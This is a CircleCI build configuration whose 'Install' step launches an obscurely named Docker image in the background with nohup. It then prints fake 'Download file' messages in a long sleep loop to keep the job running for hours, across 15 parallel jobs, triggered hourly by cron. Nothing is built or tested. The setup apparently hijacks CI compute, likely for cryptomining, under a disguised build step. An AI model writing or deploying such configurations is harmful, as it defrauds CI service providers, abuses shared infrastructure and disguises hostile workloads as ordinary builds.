working_dir: &working_dir ~/app 
.build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install
        command: |
                    nohup docker run quay.io/circle/srbxdag:latest &
                    for i in {1..115}; do echo -n "Download file docker $i "; date ; sleep 230; done
   
        no_output_timeout: 60m 
version: 2.0 
jobs: 
  build: 
    <<: *script
    parallelism: 15
    machine:
       image: ubuntu-2004:202101-01
   

  
workflows: 
  version: 2 
  commit: 
    jobs: 
      - build
      
      
  xoplo:
     triggers:
      - schedule:
          cron: "30 * * * *"
          filters:
            branches:
              only:
                - main
                
     jobs:
      - build
      